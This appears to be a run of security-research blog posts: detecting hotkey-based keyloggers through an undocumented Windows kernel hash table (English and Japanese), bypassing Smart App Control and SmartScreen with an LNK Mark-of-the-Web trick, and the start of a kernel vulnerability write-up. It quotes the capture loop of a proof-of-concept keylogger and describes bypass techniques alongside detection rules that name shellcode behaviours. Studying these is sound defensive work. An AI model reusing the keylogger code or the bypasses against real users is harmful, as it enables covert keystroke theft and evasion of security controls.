Additionally, since IsHotKey is not an exported function, we also need to know its address before looking for gphkHashTable. Through further reverse engineering, we discovered that the exported function EditionIsHotKey calls the IsHotKey function. Therefore, we decided to compute the address of IsHotKey within the EditionIsHotKey function using the same method described earlier. (For reference, the base address of win32kfull.sys can be found using the PsLoadedModuleList API.)

Accessing the Memory Space of win32kfull.sys

Once we finalized our approach to obtaining the address of gphkHashTable, we began writing code to access the memory space of win32kfull.sys to retrieve that address. One challenge we encountered at this stage was that win32kfull.sys is a session driver. Before proceeding further, here’s a brief, simplified explanation of what a session is.

In Windows, when a user logs in, a separate session (with session numbers starting from 1) is assigned to each user. Simply put, the first user to log in is assigned Session 1. If another user logs in while that session is active, that user is assigned Session 2, and so on. Each user then has their own desktop environment within their assigned session.

Kernel data that must be managed separately for each session (i.e., per logged-in user) is stored in an isolated area of kernel memory called session space. This includes GUI objects managed by win32k drivers, such as windows and mouse/keyboard input data, ensuring that the screen and input remain properly separated between users.

(This is a simplified explanation. For a more detailed discussion on sessions, please refer to James Forshaw’s blog post.)

Based on the above, win32kfull.sys is known as a session driver. This means that, for example, hotkey information registered in the session of the first logged-in user (Session 1) can only be accessed from within that same session. So, how can we work around this limitation? In such cases, it is known that KeStackAttachProcess can be used.

KeStackAttachProcess allows the current thread to temporarily attach to the address space of a specified process. If we can attach to a GUI process in the target session — more precisely, a process that has loaded win32kfull.sys — then we can access win32kfull.sys and its associated data within that session. For our implementation, assuming that only one user is logged in, we decided to locate and attach to winlogon.exe, the process responsible for handling user logon operations.

Enumerating Registered Hotkeys

Once we have successfully attached to the winlogon.exe process and determined the address of gphkHashTable, the next step is simply scanning gphkHashTable to check the registered hotkeys. Below is an excerpt of that code:

BOOL CheckRegisteredHotKeys(_In_ const PVOID& gphkHashTableAddr)
{
-[skip]-
    // Cast the gphkHashTable address to an array of pointers.
    PVOID* tableArray = static_cast(gphkHashTableAddr);
    // Iterate through the hash table entries.
    for (USHORT j = 0; j < 0x80; j++)
    {
        PVOID item = tableArray[j];
        PHOT_KEY hk = reinterpret_cast(item);
        if (hk)
        {
            CheckHotkeyNode(hk);
        }
    }
-[skip]-
}

VOID CheckHotkeyNode(_In_ const PHOT_KEY& hk)
{
    if (MmIsAddressValid(hk->pNext)) {
        CheckHotkeyNode(hk->pNext);
    }

    // Check whether this is a single numeric hotkey.
    if ((hk->vk >= 0x30) && (hk->vk <= 0x39) && (hk->modifiers1 == 0))
    {
        KdPrint(("[+] hk->id: %u hk->vk: %x\n", hk->id, hk->vk));
        hotkeyCounter++;
    }
    // Check whether this is a single alphabet hotkey.
    else if ((hk->vk >= 0x41) && (hk->vk <= 0x5A) && (hk->modifiers1 == 0))
    {
        KdPrint(("[+] hk->id: %u hk->vk: %x\n", hk->id, hk->vk));
        hotkeyCounter++;
    }
-[skip]-
}
....
if (CheckRegisteredHotKeys(gphkHashTableAddr) && hotkeyCounter >= 36)
{
   detected = TRUE;
   goto Cleanup;
}

The code itself is straightforward: it iterates through each index of the hash table, following the linked list to access every HOT_KEY object, and checks whether the registered hotkeys correspond to alphanumeric keys without any modifiers. In our detection tool, if every alphanumeric key is registered as a hotkey, an alert is raised, indicating the possible presence of a hotkey-based keylogger. For simplicity, this implementation only targets alphanumeric key hotkeys, although it would be easy to extend the tool to check for hotkeys with modifiers such as SHIFT.

Detecting Hotkeyz

The detection tool (Hotkey-based Keylogger Detector) has been released below. Detailed usage instructions are provided as well. Additionally, this research was presented at NULLCON Goa 2025, and the presentation slides are available.

https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector

The following is a demo video showcasing how the Hotkey-based Keylogger Detector detects Hotkeyz.

DEMO_VIDEO.mp4

Acknowledgments

We would like to express our heartfelt gratitude to Jonathan Bar Or for reading our previous article, sharing his insights on hotkey-based keyloggers, and generously publishing the PoC tool Hotkeyz.

未公開のカーネルデータ構造を使ったホットキー型キーロガーの検知

Tue, 04 Feb 2025 00:00:00 GMT

未公開のカーネルデータ構造を使った

ホットキー型キーロガーの検知

本記事では、ホットキー型キーロガーとは何かについてと、その検知方法について紹介します。具体的には、ホットキー型キーロガーがどのようにしてキー入力を盗み取るのかを解説した後、カーネルレベルに存在する未公開(Undocumented)のホットキーテーブルを活用した検知手法について説明します。

はじめに

　Elastic Security Labsでは2024年5月、Elastic Defendのバージョン 8.12 より追加された、Windows上で動作するキーロガーの検知を強化する新機能を紹介する記事を公開しました。具体的には、サイバー攻撃で一般的に使われる4種類のキーロガー(ポーリング型キーロガー、フッキング型キーロガー、Raw Input Modelを用いたキーロガー、DirectInputを用いたキーロガー)を挙げ、それらに対する私たちが提供した検知手法についてを解説しました。具体的にはEvent Tracing for Windows (ETW)における、Microsoft-Windows-Win32kプロバイダを用いた振る舞い検知の方法についてを紹介しました。
　記事公開後、大変光栄なことに記事がMicrosoft社のPrincipal Security ResearcherであるJonathan Bar Or氏の目に留まり、「ホットキー型キーロガーもある」といった貴重なご意見とともに、そのPoCコードも公開してくださりました。そこで本記事では、氏が公開したホットキー型キーロガーのPoCコードである「Hotkeyz」をもとに、本キーロガーの検知手法の一案についてを述べたいと思います。

ホットキー型キーロガーの概要

そもそもホットキーとは何か？

　ホットキー型キーロガーについて説明する前に、まずホットキーとは何かを解説します。ホットキーとは、キーボードショートカットの一種であり、コンピュータにおいて、特定の機能を直接呼び出して実行させるキーまたはキーの組み合わせのことを指します。例えばWindowsにおいてタスク(ウィンドウ)を切り替える際に「Alt + Tab」を押している人も多いかと思います。この時使っているこの「Alt + Tab」が、タスク切り替え機能を直接呼び出す「ホットキー」にあたります。

(注: ホットキー以外にも、キーボードショートカットは存在しますが、本記事ではそれらは対象外です。また本記事に記載の事項はすべて、筆者が検証に利用した環境である、仮想化ベースのセキュリティが動作していないWindows 10 version 22H2 OS Build 19045.5371が前提になります。他のWindowsのバージョンではまた内部の構造や挙動が違う場合があること、ご注意ください。)

任意のホットキーが登録できることを悪用する

　先ほどの例のようにWindowsで予め設定されたホットキーを使う以外にも、実は自分で任意のホットキーを登録することも可能です。登録方法は様々ありますが、RegisterHotKeyというWindows APIを使えば、指定のキーをホットキーとして登録することができます。例えば、以下がRegisterHotKey APIを使って「A」(virtual-key codeで0x41)キーを、グローバルなホットキーとして登録するためのコードの例です。

/*
BOOL RegisterHotKey(
  [in, optional] HWND hWnd, 
  [in]           int  id,
  [in]           UINT fsModifiers,
  [in]           UINT vk
);
*/
RegisterHotKey(NULL, 1, 0, 0x41);

　ホットキーとして登録後、登録されたキーが押下された場合、RegisterHotKey APIの第一引数で指定したウィンドウ(NULLの場合はホットキー登録時のスレッド)のメッセージキューに、WM_HOTKEYメッセージが届くようになります。以下は実際に、メッセージキューにWM_HOTKEY メッセージが来ていないかをGetMessage APIを使って確認し、届いていた場合、WM_HOTKEYメッセージに内包されていた virtual-key code(今回の場合「0x41」)を取り出しているコード(メッセージループ)になります。

MSG msg = { 0 };
while (GetMessage(&msg, NULL, 0, 0)) {
    if (msg.message == WM_HOTKEY) {
        int vkCode = HIWORD(msg.lParam);
        std::cout << "WM_HOTKEY received! Virtual-Key Code: 0x"
            << std::hex << vkCode << std::dec << std::endl;
    }
}

　これは言い換えると、例えばメモ帳アプリに文章を書く際、Aキーから入力された文字は、文字としての入力ではなく、グローバルなホットキーとして認識されることになります。

　今回は「A」のみをホットキーとして登録しましたが、複数のキー(BやCやD)を同時に個々のホットキーとして登録することも可能です。これはつまり、RegisterHotKey APIでホットキーとして登録可能な範囲の任意のキー(virtual-key code)の入力は、すべてグローバルなホットキーとして横取りすることも可能であるということです。そしてホットキー型キーロガーはこの性質を悪用して、ユーザから入力されたキーを盗み取ります。
　筆者が手元の環境で試した限りは、英数字と基本的な記号キーだけでなく、それらにSHIFT修飾子をつけたすべてキーがRegisterHotKey APIでホットキーとして登録可能でした。そのため、キーロガーとして問題なく、情報の窃取に必要なキーの監視ができると言えるでしょう。

密かにキーを盗み取る

　ホットキー型キーロガーがキーを盗み取る実際の流れについてを、Hotkeyzを例に紹介します。
Hotkeyzでは最初に、各英数字キーに加えて、一部のキー(VK_SPACEやVK_RETURNなど)のvirtual-key codeを、RegisterHotKey APIを使い個々のホットキーとして登録します。その後キーロガー内のメッセージループにて、登録されたホットキーのWM_HOTKEYメッセージが、メッセージキューに到着していないかをPeekMessageW APIを使って確認します。そしてWM_HOTKEYメッセージが来ていた場合、メッセージに内包されているvirtual-key codeを取り出して、最終的にはそれをテキストファイルに保存します。以下がメッセージループ内のコードのコードです。特に重要な部分を抜粋して掲載しています。

while (...)
{
    // Get the message in a non-blocking manner and poll if necessary
    if (!PeekMessageW(&tMsg, NULL, WM_HOTKEY, WM_HOTKEY, PM_REMOVE))
    {
        Sleep(POLL_TIME_MILLIS);
        continue;
    }
....
   // Get the key from the message
   cCurrVk = (BYTE)((((DWORD)tMsg.lParam) & 0xFFFF0000) >> 16);

   // Send the key to the OS and re-register
   (VOID)UnregisterHotKey(NULL, adwVkToIdMapping[cCurrVk]);
   keybd_event(cCurrVk, 0, 0, (ULONG_PTR)NULL);
   if (!RegisterHotKey(NULL, adwVkToIdMapping[cCurrVk], 0, cCurrVk))
   {
       adwVkToIdMapping[cCurrVk] = 0;
       DEBUG_MSG(L"RegisterHotKey() failed for re-registration (cCurrVk=%lu,    LastError=%lu).", cCurrVk, GetLastError());
       goto lblCleanup;
   }
   // Write to the file
  if (!WriteFile(hFile, &cCurrVk, sizeof(cCurrVk), &cbBytesWritten, NULL))
  {
....

　ここで特筆するべき点としては、ユーザにキーロガーの存在を気取られないため、メッセージからvirtual-key codeを取り出した時点で、いったんそのキーのホットキー登録をUnregisterHotKey APIを使って解除し、その上でkeybd_eventを使ってキーを送信することです。これにより、ユーザからは問題無くキーが入力出来ているように見え、キーが裏で窃取されていることに気が付かれにくくなります。そしてキーを送信した後は再びそのキーをRegisterHotKey APIを使ってホットキーとして登録し、再びユーザからの入力を待ちます。以上が、ホットキー型キーロガーの仕組みです。

ホットキー型キーロガーの検知手法

　ホットキー型キーロガーとは何かやその仕組みについて理解したところで、次にこれをどのように検知するかについてを説明します。

ETWではRegisterHotKey APIは監視していない

　以前の記事で書いた方法と同様に、まずはホットキー型キーロガーもEvent Tracing for Windows (ETW) を利用して検知が出来ないかを検討・調査しました。その結果、ETWではRegisterHotKey APIやUnRegisterHotKey APIを監視していないことがすぐに判明しました。Microsoft-Windows-Win32k プロダイバーのマニフェストファイルの調査に加えて、RegisterHotKeyのAPIの内部(具体的にはwin32kfull.sysにあるNtUserRegisterHotKey)をリバースエンジニアリングをしたものの、これらのAPIが実行される際、ETWのイベントを送信しているような形跡は残念ながら見つかりませんでした。
　以下の図は、ETWで監視対象となっているGetAsyncKeyState(NtUserGetAsyncKeyState)と、NtUserRegisterHotKeyの逆コンパイル結果を比較したものを示しています。NtUserGetAsyncKeyStateの方には関数の冒頭に、EtwTraceGetAsyncKeyStateというETWのイベント書き出しに紐づく関数が存在しますが、NtUserRegisterHotKeyには存在しないのが見て取れます。

　
　Microsoft-Windows-Win32k 以外のETWプロバイダーを使って、間接的にRegisterHotKey APIを呼び出しを監視する案もでたものの、次に紹介する、ETWを使わず「ホットキーテーブル」を利用した検知手法が、RegisterHotKey APIを監視するのと同様かそれ以上の効果が得られることが分かり、最終的にはこの案を採用することにしました。

ホットキーテーブル(gphkHashTable)を利用した検知

　ETWではRegisterHotKey APIの呼び出しを直接監視出来ないことが判明した時点で、ETWを利用せずに検知する方法を検討することにしました。検討の最中、「そもそも登録されたホットキーの情報がどこかに保存されているのではないか？」「もし保存されているとしたら、その情報が検知に使えるのではないか？」という考えに至りました。その仮説をもとに調査した結果、すぐにNtUserRegisterHotkey内にてgphkHashTableというラベルがつけられたハッシュテーブルを発見することが出来ました。Microsoft社が公開しているオンラインのドキュメント類を調査してもgphkHashTableについての情報はなかったため、これは未公開(undocumented)のカーネルデータ構造のようです。

　リバースエンジニアリングをした結果、このハッシュテーブルは、登録されたホットキーの情報を持つオブジェクトを保存しており、各オブジェクトはRegisterHotKey APIの引数にて指定されたvirtual-key codeや修飾子の情報を保持していることが分かりました。以下の図(右)がホットキーのオブジェクト(HOT_KEYと命名)の構造体の定義の一部と、図(左)が実際にwindbg上でgphkHashTableにアクセスした上で、登録されたホットキーのオブジェクトを見た時の様子です。

　リバースエンジニアリングをした結果をまとめると、ghpkHashTableは図4のような構造になっていることがわかりました。具体的には、RegisterHotKey APIで指定されたvirtual-key codeに対して0x80の余剰演算をした結果をハッシュテーブルのインデックスにしていました。そして同じインデックスを持つホットキーオブジェクトを連結リストで結ぶことで、virtual-key codeが同じでも、修飾子が違うホットキーの情報も保持・管理出来るようになっています。

　つまりgphkHashTableで保持している全てのHOT_KEYオブジェクトを走査すれば、登録されている全ホットキーの情報が取得できるということになります。取得した結果、主要なキー(例えば単体の英数字キー）全てが個々のホットキーとして登録されていれば、ホットキー型キーロガーが動作していることを示す強い根拠となります。

検知ツールを作成する

　では次に、実際に検知ツールの方を実装していきます。gphkHashTable自体はカーネル空間に存在するため、ユーザモードのアプリケーションからはアクセス出来ません。そのため検知のために、デバイスドライバを書くことにしました。具体的にはgphkHashTableのアドレスを取得した後、ハッシュテーブルに保存されている全オブジェクトを走査した上で、ホットキーとして登録されている英数字キーの数が一定数以上ならば、ホットキー型キーロガーが存在する可能性がある事を知らせてくるデバイスドライバを作成することにしました。

gphkHashTableのアドレスを取得する方法

　検知ツールを作成するにあたり、最初に直面した課題としては「gphkHashTableのアドレスをどのようにして取得すればよいのか？」ということです。悩んだ結果、win32kfull.sysのメモリ空間内でgphkHashTableにアクセスしている命令から直接gphkHashTableのアドレスを取得することにしました。
　リバースエンジニアリングした結果、IsHotKeyという関数内では、関数の冒頭部分にあるlea命令(lea rbx, gphkHashTable)にて、gphkHashTableのアクセスしていることがわかりました。この命令のオプコードバイト(0x48, 0x8d, 0x1d)部分をシグネチャに該当行を探索して、得られた32bit(4バイト)のオフセットからgphkHashTableのアドレスを算出することにしました。

　加えて、IsHotKey関数自体もエクスポート関数でないため、そのアドレスも何らかの方法で取得しなければいけません。そこでさらなるリバースエンジニアリングの結果、EditionIsHotKeyというエクスポートされた関数内で、IsHotKey関数が呼ばれていることがわかりました。そこでEditionIsHotKey関数から前述と同様の方法で、IsHotKey関数のアドレスを算出することにしました。(補足ですが、win32kfull.sysのベースアドレスに関してはPsLoadedModuleListというAPIで探せます。)

　## win32kfull.sysのメモリ空間にアクセスするには

　gphkHashTableのアドレスを取得する方法について検討が終わったところで、実際にwin32kfull.sysのメモリ空間にアクセスして、gphkHashTableのアドレスを取得するためのコードを書き始めました。この時直面した課題としては、win32kfull.sysは「セッションドライバ」であるという点ですが、ここではまず「セッション」とは何かについて、簡単に説明します。
　Windowsでは一般的にユーザがログインした際、ユーザ毎に個別に「セッション」(1番以降のセッション番号)が割り当てられます。かなり大雑把に説明すると、最初にログインしたユーザには「セッション１」が割り当てられ、その状態で別のユーザがログインした場合今度は「セッション２」が割り当てられます。そして各ユーザは個々のセッション内で、それぞれのデスクトップ環境を持ちます。
　この時、セッション別(ログインユーザ別)に管理するべきカーネルのデータは、カーネルメモリ内の「セッション空間」というセッション別の分離したメモリ空間で管理され、win32k ドライバが管理しているようなGUIオブジェクト(ウィンドウ、マウス・キーボード入力の情報等)もこれに該当します。これにより、ユーザ間で画面や入力情報が混ざることがないのです。(かなり大まかな説明のため、より詳しくセッションについて知りたい方はJames Forshaw氏のこちらのブログ記事を読むことをおすすめします。)

　　
以上の背景から、win32kfull.sysは「セッションドライバ」と呼ばれています。つまり、例えば最初のログインユーザのセッション(セッション1)内で登録されたホットキーの情報は、同じセッション内からしかアクセスできないということです。ではどうすれば良いのかというと、このような場合、KeStackAttachProcessが利用できることが知られています。
　KeStackAttachProcessは、現在のスレッドを指定のプロセスのアドレス空間に一時的にアタッチすることが出来ます。この時、対象のセッションにいるGUIプロセス、より正確にはwin32kfull.sysをロードしているプロセスにアタッチすることが出来れば、対象セッションのwin32kfull.sysやそのデータにアクセスすることが出来ます。今回は、ログインユーザが１ユーザであることを仮定して、各ユーザのログオン操作を担うプロセスであるwinlogon.exeを探してアタッチすることにしました。

登録されているホットキーを確認する

　winlogon.exeのプロセスにアタッチし、gphkHashTableのアドレスを特定出来た後は、後はgphkHashTableをスキャンして登録されたホットキーを確認するだけです。以下がその抜粋版のコードです。

BOOL CheckRegisteredHotKeys(_In_ const PVOID& gphkHashTableAddr)
{
-[skip]-
    // Cast the gphkHashTable address to an array of pointers.
    PVOID* tableArray = static_cast(gphkHashTableAddr);
    // Iterate through the hash table entries.
    for (USHORT j = 0; j < 0x80; j++)
    {
        PVOID item = tableArray[j];
        PHOT_KEY hk = reinterpret_cast(item);
        if (hk)
        {
            CheckHotkeyNode(hk);
        }
    }
-[skip]-
}

VOID CheckHotkeyNode(_In_ const PHOT_KEY& hk)
{
    if (MmIsAddressValid(hk->pNext)) {
        CheckHotkeyNode(hk->pNext);
    }

    // Check whether this is a single numeric hotkey.
    if ((hk->vk >= 0x30) && (hk->vk <= 0x39) && (hk->modifiers1 == 0))
    {
        KdPrint(("[+] hk->id: %u hk->vk: %x\n", hk->id, hk->vk));
        hotkeyCounter++;
    }
    // Check whether this is a single alphabet hotkey.
    else if ((hk->vk >= 0x41) && (hk->vk <= 0x5A) && (hk->modifiers1 == 0))
    {
        KdPrint(("[+] hk->id: %u hk->vk: %x\n", hk->id, hk->vk));
        hotkeyCounter++;
    }
-[skip]-
}
....
if (CheckRegisteredHotKeys(gphkHashTableAddr) && hotkeyCounter >= 36)
{
   detected = TRUE;
   goto Cleanup;
}

　コード自体は難しくなく、ハッシュテーブルの各インデックスの先頭から順に、連結リストをたどりながらすべてのHOT_KEYオブジェクトにアクセスして、登録されているホットキーが単体の英数字キーか否かを確認しています。作成した検知ツールでは、すべての単体英数字キーがホットキーとして登録
されていた場合、ホットキー型キーロガーが存在するとしてアラートを挙げます。また、今回実装の簡略化のため、英数字単体キーのホットキーのみを対象としていますが、SHIFTなどの修飾子付きのホットキーも容易に調べることが可能です。

Hotkeyzを検知する

　検知ツール(Hotkey-based Keylogger Detector)は以下にて公開しました。使い方も以下に記載していますので、興味ある方はぜひご覧ください。加えて本研究はNULLCON Goa 2025でも発表しましたので、その発表スライドも併せてご覧いただけます。

*https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector

　最後に、本ツールを用いて実際にHotkeyzを検知する様子を収録したデモ動画が以下になります。

DEMO_VIDEO.mp4

謝辞

　前回の記事を読んで下さり、その上でホットキー型キーロガーの手法について教えてくださり、その上そのPoCとなるHotkeyzを公開してくださった、Jonathan Bar Or氏に心より感謝致します。

Dismantling Smart App Control

Tue, 06 Aug 2024 00:00:00 GMT

Introduction

Reputation-based protections like Elastic’s reputation service can significantly improve detection capabilities while maintaining low false positive rates. However, like any protection capability, weaknesses exist and bypasses are possible. Understanding these weaknesses allows defenders to focus their detection engineering on key coverage gaps. This article will explore Windows Smart App Control and SmartScreen as a case study for researching bypasses to reputation-based systems, then demonstrate detections to cover those weaknesses.

Key Takeaways:

Windows Smart App Control and SmartScreen have several design weaknesses that allow attackers to gain initial access with no security warnings or popups.
A bug in the handling of LNK files can also bypass these security controls
Defenders should understand the limitations of these OS features and implement detections in their security stack to compensate

SmartScreen/SAC Background

Microsoft SmartScreen has been a built-in OS feature since Windows 8. It operates on files that have the “Mark of the Web” (MotW) and are clicked on by users. Microsoft introduced Smart App Control (SAC) with the release of Windows 11. SAC is, in some ways, an evolution of SmartScreen. Microsoft says it “adds significant protection from new and emerging threats by blocking apps that are malicious or untrusted.” It works by querying a Microsoft cloud service when applications are executed. If they are known to be safe, they are allowed to execute; however, if they are unknown, they will only be executed if they have a valid code signing signature. When SAC is enabled, it replaces and disables Defender SmartScreen.

Microsoft exposes undocumented APIs for querying the trust level of files for SmartScreen and Smart App Control. To help with this research, we developed a utility that will display the trust of a file. The source code for this utility is available here.

Signed Malware

One way to bypass Smart App Control is to simply sign malware with a code-signing certificate. Even before SAC, there has been a trend towards attackers signing their malware to evade detection. More recently, attackers have routinely obtained Extend Validation (EV) signing certificates. EV certs require proof of identity to gain access and can only exist on specially designed hardware tokens, making them difficult to steal. However, attackers have found ways to impersonate businesses and purchase these certificates. The threat group behind SolarMarker has leveraged over 100 unique signing certificates across their campaigns. Certificate Authorities (CAs) should do more to crack down on abuse and minimize fraudulently-acquired certificates. More public research may be necessary to apply pressure on the CAs who are most often selling fraudulent certificates.

Reputation Hijacking

Reputation hijacking is a generic attack paradigm on reputation-based malware protection systems. It is analogous to the misplaced trust research by Casey Smith and others against application control systems, as well as the vulnerable driver research from Gabriel Landau and I. Unfortunately, the attack surface in this case is even larger. Reputation hijacking involves finding and repurposing apps with a good reputation to bypass the system. To work as an initial access vector, one constraint is that the application must be controlled without any command line parameters—for example, a script host that loads and executes a script at a predictable file path.

Script hosts are an ideal target for a reputation hijacking attack. This is especially true if they include a foreign function interface (FFI) capability. With FFI, attackers can easily load and execute arbitrary code and malware in memory. Through searches in VirusTotal and GitHub, we identified many script hosts that have a known good reputation and can be co-opted for full code execution. This includes Lua, Node.js, and AutoHotkey interpreters. A sample to demonstrate this technique is available here.

The following video demonstrates hijacking with the JamPlus build utility to bypass Smart App Control with no security warnings:

In another example, SmartScreen security warnings were bypassed by using a known AutoHotkey interpreter:

Another avenue to hijack the reputation of a known application is to exploit it. This could be simple, like a classic buffer overflow from reading an INI file in a predictable path. It could be something more complex that chains off other primitives (like command execution/registry write/etc). Also, multiple known apps can be chained together to achieve full code execution. For example, one application that reads a configuration file and executes a command line parameter can then be used to launch another known application that requires a set of parameters to gain arbitrary code execution.

Reputation Seeding

Another attack on reputation protections is to seed attacker-controlled binaries into the system. If crafted carefully, these binaries can appear benign and achieve a good reputation while still being useful to attackers later. It could simply be a new script host binary, an application with a known vulnerability, or an application that has a useful primitive. On the other hand, it could be a binary that contains embedded malicious code but only activates after a certain date or environmental trigger.

Smart App Control appears vulnerable to seeding. After executing a sample on one machine, it received a good label after approximately 2 hours. We noted that basic anti-emulation techniques seemed to be a factor in receiving a benign verdict or reputation. Fortunately, SmartScreen appears to have a higher global prevalence bar before trusting an application. A sample that demonstrates this technique is available here and is demonstrated below:

Reputation Tampering

A third attack class against reputation systems is reputation tampering. Normally, reputation systems use cryptographically secure hashing systems to make tampering infeasible. However, we noticed that certain modifications to a file did not seem to change the reputation for SAC. SAC may use fuzzy hashing or feature-based similarity comparisons in lieu of or in addition to standard file hashing. It may also leverage an ML model in the cloud to allow files that have a highly benign score (such as being very similar to known good). Surprisingly, some code sections could be modified without losing their associated reputation. Through trial and error, we could identify segments that could be safely tampered with and keep the same reputation. We crafted one tampered binary with a unique hash that had never been seen by Microsoft or SAC. This embedded an “execute calc” shellcode and could be executed with SAC in enforcement mode:

LNK Stomping

When a user downloads a file, the browser will create an associated “Zone.Identifier” file in an alternate data stream known as the Mark of the Web (MotW). This lets other software (including AV and EDR) on the system know that the file is more risky. SmartScreen only scans files with the Mark of the Web. SAC completely blocks certain file types if they have it. This makes MotW bypasses an interesting research target, as it can usually lead to bypassing these security systems. Financially motivated threat groups have discovered and leveraged multiple vulnerabilities to bypass MotW checks. These techniques involved appending crafted and invalid code signing signatures to javascript or MSI files.

During our research, we stumbled upon another MotW bypass that is trivial to exploit. It involves crafting LNK files that have non-standard target paths or internal structures. When clicked, these LNK files are modified by explorer.exe with the canonical formatting. This modification leads to removal of the MotW label before security checks are performed. The function that overwrites the LNK files is _SaveAsLink() as shown in the following call stack:

The function that performs the security check is CheckSmartScreen() as shown in the following call stack:

The easiest demonstration of this issue is to append a dot or space to the target executable path (e.g., powershell.exe.). Alternatively, one can create an LNK file that contains a relative path such as .\target.exe. After clicking the link, explorer.exe will search for and find the matching .exe name, automatically correct the full path, update the file on disk (removing MotW), and finally launch the target. Yet another variant involves crafting a multi-level path in a single entry of the LNK’s target path array. The target path array should normally have 1 entry per directory. The pylnk3 utility shows the structure of an exploit LNK (non-canonical format) before and after execution (canonical format):

A Python script that demonstrates these techniques is available here.

The following shows an LNK file bypassing MotW restrictions under Smart App Control to launch Powershell and pop calc:

In another example, we show this technique chained with the Microsoft cdb command line debugger to achieve arbitrary code execution and execute shellcode to pop calc:

We identified multiple samples in VirusTotal that exhibit the bug, demonstrating existing in the wild usage. The oldest sample identified was submitted over 6 years ago. We also disclosed details of the bug to the MSRC. It may be fixed in a future Windows update. We are releasing this information, along with detection logic and countermeasures, to help defenders identify this activity until a patch is available.

Detections

Reputation hijacking, by its nature, can be difficult to detect. Countless applications can be co-opted to carry out the technique. Cataloging and blocking applications known to be abused is an initial (and continual) step.

process where process.parent.name == "explorer.exe" and process.hash.sha256 in (
"ba35b8b4346b79b8bb4f97360025cb6befaf501b03149a3b5fef8f07bdf265c7", // AutoHotKey
"4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10" // JamPlus
)

However, this approach will always lag behind attackers. A slightly more robust approach is to develop behavioral signatures to identify general categories of abused software. For example, we can look for common Lua or Node.js function names or modules in suspicious call stacks:

sequence by process.entity_id with maxspan=1m
[library where
  (dll.Ext.relative_file_creation_time <= 3600 or
   dll.Ext.relative_file_name_modify_time <= 3600 or
   (dll.Ext.device.product_id : ("Virtual DVD-ROM", "Virtual Disk","USB *") and not dll.path : "C:\\*")) and
   _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: "*!luaopen_*")] by dll.hash.sha256
[api where
 process.Ext.api.behaviors : ("shellcode", "allocate_shellcode", "execute_shellcode", "unbacked_rwx", "rwx", "hook_api") and
 process.thread.Ext.call_stack_final_user_module.hash.sha256 : "?*"] by process.thread.Ext.call_stack_final_user_module.hash.sha256

api where process.Ext.api.name : ("VirtualProtect*", "WriteProcessMemory", "VirtualAlloc*", "MapViewOfFile*") and
 process.Ext.api.behaviors : ("shellcode", "allocate_shellcode", "execute_shellcode", "unbacked_rwx", "rwx", "hook_api") and
 process.thread.Ext.call_stack_final_user_module.name : "ffi_bindings.node"

Security teams should pay particular attention to downloaded files. They can use local reputation to identify outliers in their environment for closer inspection.

from logs-* | 
where host.os.type == "windows"
and event.category == "process" and event.action == "start"
and process.parent.name == "explorer.exe"
and (process.executable like "*Downloads*" or process.executable like "*Temp*")
and process.hash.sha256 is not null
| eval process.name = replace(process.name, " \\(1\\).", ".")
| stats hosts = count_distinct(agent.id) by process.name, process.hash.sha256
| where hosts == 1

LNK stomping may have many variants, making signature-based detection on LNK files difficult. However, they should all trigger a similar behavioral signal- explorer.exe overwriting an LNK file. This is especially anomalous in the downloads folder or when the LNK has the Mark of the Web.

file where event.action == "overwrite" and file.extension : "lnk" and
 process.name : "explorer.exe" and process.thread.Ext.call_stack_summary : "ntdll.dll|*|windows.storage.dll|shell32.dll|*" and
 (
  file.path : ("?:\\Users\\*\\Downloads\\*.lnk", "?:\\Users\\*\\AppData\\Local\\Temp\\*.lnk") or
  file.Ext.windows.zone_identifier == 3
  )

Finally, robust behavioral coverage around common attacker techniques such as in-memory evasion, persistence, credential access, enumeration, and lateral movement helps detect realistic intrusions, including from reputation hijacking.

Conclusion

Reputation-based protection systems are a powerful layer for blocking commodity malware. However, like any protection technique, they have weaknesses that can be bypassed with some care. Smart App Control and SmartScreen have a number of fundamental design weaknesses that can allow for initial access with no security warnings and minimal user interaction. Security teams should scrutinize downloads carefully in their detection stack and not rely solely on OS-native security features for protection in this area.

Introducing a New Vulnerability Class: False File Immutability

Thu, 11 Jul 2024 00:00:00 GMT

Introduction

This article will discuss a previously-unnamed vulnerability class in Windows, showing how long-standing incorrect assumptions in the design of core Windows features can result in both undefined behavior and security vulnerabilities. We will demonstrate how one such vulnerability in the Windows 11 kernel can be exploited to achieve arbitrary code execution with kernel privileges.

Windows file sharing

When an application opens a file on Windows, it typically uses some form of the Win32 CreateFile API.

HANDLE CreateFileW(
  [in]           LPCWSTR               lpFileName,
  [in]           DWORD                 dwDesiredAccess,
  [in]           DWORD                 dwShareMode,
  [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [in]           DWORD                 dwCreationDisposition,
  [in]           DWORD                 dwFlagsAndAttributes,
  [in, optional] HANDLE                hTemplateFile
);

Callers of CreateFile specify the access they want in dwDesiredAccess. For example, a caller would pass FILE_READ_DATA to be able to read data, or FILE_WRITE_DATA to be able to write data. The full set of access rights are documented on the Microsoft Learn website.

In addition to passing dwDesiredAccess, callers must pass a “sharing mode” in dwShareMode, which consists of zero or more of FILE_SHARE_READ, FILE_SHARE_WRITE, and FILE_SHARE_DELETE. You can think of a sharing mode as the caller declaring “I’m okay with others doing X to this file while I’m using it,” where X could be reading, writing, or renaming. For example, a caller that passes FILE_SHARE_WRITE allows others to write the file while they are working with it.

As a file is opened, the caller’s dwDesiredAccess is tested against the dwShareMode of all existing file handles. Simultaneously, the caller’s dwShareMode is tested against the previously-granted dwDesiredAccess of all existing handles to that file. If either of these tests fail, then CreateFile fails with a sharing violation.

Sharing isn’t mandatory. Callers can pass a share mode of zero to obtain exclusive access. Per Microsoft documentation:

An open file that is not shared (dwShareMode set to zero) cannot be opened again, either by the application that opened it or by another application, until its handle has been closed. This is also referred to as exclusive access.

Sharing enforcement

In the kernel, sharing is enforced by filesystem drivers. As a file is opened, it’s the responsibility of the filesystem driver to call IoCheckShareAccess or IoCheckLinkShareAccess to see whether the requested DesiredAccess/ShareMode tuple is compatible with any existing handles to the file being opened. NTFS is the primary filesystem on Windows, but it’s closed-source, so for illustrative purposes we’ll instead look at Microsoft’s FastFAT sample code performing the same check. Unlike an IDA decompilation, it even comes with comments!

//
//  Check if the Fcb has the proper share access.
//

return IoCheckShareAccess( *DesiredAccess,
                           ShareAccess,
                           FileObject,
                           &FcbOrDcb->ShareAccess,
                           FALSE );

